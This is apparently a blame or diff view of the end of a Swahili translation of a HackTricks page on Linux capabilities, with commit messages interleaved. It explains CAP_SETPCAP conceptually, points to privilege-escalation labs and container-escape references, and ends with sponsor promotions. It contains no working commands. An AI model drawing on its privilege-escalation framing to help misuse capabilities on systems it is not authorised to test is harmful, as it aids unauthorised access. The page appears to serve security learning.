+								**CAP_SETPCAP** inawezesha mchakato kubadilisha seti za uwezo za mchakato mwingine, kuruhusu kuongeza au kuondoa uwezo kutoka kwenye seti za uwezo zilizopo, kurithiwa, na kuruhusiwa. Walakini, mchakato huo unaweza tu kubadilisha uwezo ambao una katika seti yake ya kuruhusiwa, kuhakikisha kuwa hauwezi kuinua mamlaka ya mchakato mwingine zaidi ya mamlaka yake mwenyewe. Maboresho ya hivi karibuni kwenye kernel yameimarisha sheria hizi, kuzuia `CAP_SETPCAP` kufanya tu uwezo wa kupunguza katika seti zake za kuruhusiwa au za watoto wake, lengo likiwa kupunguza hatari za usalama. Matumizi yanahitaji kuwa na `CAP_SETPCAP` katika seti ya uwezo inayofanya kazi na uwezo wa lengo katika seti ya kuruhusiwa, kwa kutumia `capset()` kwa marekebisho. Hii inafupisha kazi kuu na mipaka ya `CAP_SETPCAP`, ikionyesha jukumu lake katika usimamizi wa mamlaka na kuimarisha usalama.
-												a

											
										
										
											2024-02-07 04:06:18 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**`CAP_SETPCAP`** ni uwezo wa Linux ambao inaruhusu mchakato kubadilisha seti za uwezo za mchakato mwingine. Inatoa uwezo wa kuongeza au kuondoa uwezo kutoka kwenye seti za uwezo zilizopo, kurithiwa, na kuruhusiwa za mchakato mwingine. Walakini, kuna vizuizi fulani juu ya jinsi uwezo huu unaweza kutumika.
-												GITBOOK-3861: change request with no subject merged in GitBook

											
										
										
											2023-04-05 06:58:34 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Mchakato wenye `CAP_SETPCAP` **anaweza tu kutoa au kuondoa uwezo ambao upo katika seti yake ya uwezo iliyoruhusiwa**. Kwa maneno mengine, mchakato hauwezi kutoa uwezo kwa mchakato mwingine ikiwa hauna uwezo huo mwenyewe. Kizuizi hiki kinazuia mchakato kuinua mamlaka ya mchakato mwingine zaidi ya kiwango chake cha mamlaka.
-												GITBOOK-3861: change request with no subject merged in GitBook

											
										
										
											2023-04-05 06:58:34 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Zaidi ya hayo, katika toleo jipya la kernel, uwezo wa `CAP_SETPCAP` umepata **kizuizi zaidi**. Sasa haikuruhusu mchakato kubadilisha seti za uwezo za mchakato mwingine kwa hiari. Badala yake, **inaruhusu mchakato kupunguza uwezo katika seti yake ya uwezo iliyoruhusiwa au seti ya uwezo iliyoruhusiwa ya watoto wake**. Mabadiliko haya yalifanywa ili kupunguza hatari za usalama zinazohusiana na uwezo huo.
-												GITBOOK-3861: change request with no subject merged in GitBook

											
										
										
											2023-04-05 06:58:34 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Ili kutumia `CAP_SETPCAP` kwa ufanisi, unahitaji kuwa na uwezo huo katika seti yako ya uwezo inayofanya kazi na uwezo wa lengo katika seti yako ya uwezo iliyoruhusiwa. Kisha unaweza kutumia wito wa mfumo wa `capset()` kubadilisha seti za uwezo za mchakato mwingine.
-												GITBOOK-3861: change request with no subject merged in GitBook

											
										
										
											2023-04-05 06:58:34 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Kwa muhtasari, `CAP_SETPCAP` inaruhusu mchakato kubadilisha seti za uwezo za mchakato mwingine, lakini hauwezi kutoa uwezo ambao hauna mwenyewe. Zaidi ya hayo, kutokana na wasiwasi wa usalama, utendaji wake umepunguzwa katika toleo jipya la kernel ili kuruhusu tu kupunguza uwezo katika seti yake ya uwezo iliyoruhusiwa au seti ya uwezo iliyoruhusiwa ya watoto wake.
-												GITBOOK-3861: change request with no subject merged in GitBook

											
										
										
											2023-04-05 06:58:34 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								## Marejeo
-												GitBook: [master] one page modified
											
										
										
											2020-08-27 16:07:19 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Mifano mingi ya hii ilichukuliwa kutoka kwa maabara fulani za** [**https://attackdefense.pentesteracademy.com/**](https://attackdefense.pentesteracademy.com), kwa hivyo ikiwa unataka kufanya mazoezi ya mbinu hizi za kuongeza mamlaka, napendekeza maabara haya.
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 17:17:49 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Marejeo mengine**:
-												GitBook: [master] one page modified
											
										
										
											2021-01-08 17:17:49 +00:00
-												GitBook: [master] one page modified
											
										
										
											2020-08-27 16:07:19 +00:00
+								* [https://vulp3cula.gitbook.io/hackers-grimoire/post-exploitation/privesc-linux](https://vulp3cula.gitbook.io/hackers-grimoire/post-exploitation/privesc-linux)
-												GitBook: [#3219] No subject

											
										
										
											2022-05-20 11:11:49 +00:00
+								* [https://www.schutzwerk.com/en/43/posts/linux\_container\_capabilities/#:\~:text=Inherited%20capabilities%3A%20A%20process%20can,a%20binary%2C%20e.g.%20using%20setcap%20.](https://www.schutzwerk.com/en/43/posts/linux\_container\_capabilities/)
-												GitBook: [master] one page modified
											
										
										
											2020-08-27 17:33:06 +00:00
+								* [https://linux-audit.com/linux-capabilities-101/](https://linux-audit.com/linux-capabilities-101/)
 								* [https://www.linuxjournal.com/article/5737](https://www.linuxjournal.com/article/5737)
-												GitBook: [#2951] No subject

											
										
										
											2022-01-16 17:15:05 +00:00
+								* [https://0xn3va.gitbook.io/cheat-sheets/container/escaping/excessive-capabilities#cap\_sys\_module](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/excessive-capabilities#cap\_sys\_module)
-												Linux capabilities : add CAP_MKNOD


											
										
										
											2023-01-17 17:42:59 +00:00
+								* [https://labs.withsecure.com/publications/abusing-the-access-to-mount-namespaces-through-procpidroot](https://labs.withsecure.com/publications/abusing-the-access-to-mount-namespaces-through-procpidroot)
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												GitBook: [#3622] No subject

											
										
										
											2022-10-25 15:56:49 +00:00
 								<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								[**RootedCON**](https://www.rootedcon.com/) ni tukio muhimu zaidi la usalama wa mtandao nchini **Hispania** na moja ya muhimu zaidi barani **Ulaya**. Kwa **kukuza maarifa ya kiufundi**, mkutano huu ni mahali pa kukutana kwa wataalamu wa teknolojia na usalama wa mtandao katika kila uwanja.
-												GitBook: [#3622] No subject

											
										
										
											2022-10-25 15:56:49 +00:00
 								{% embed url="https://www.rootedcon.com/" %}
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
+								<details>
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Njia nyingine za kusaidia HackTricks:
-												arte

											
										
										
											2023-12-30 20:49:49 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
 								* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
 								* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
 								* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 								* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>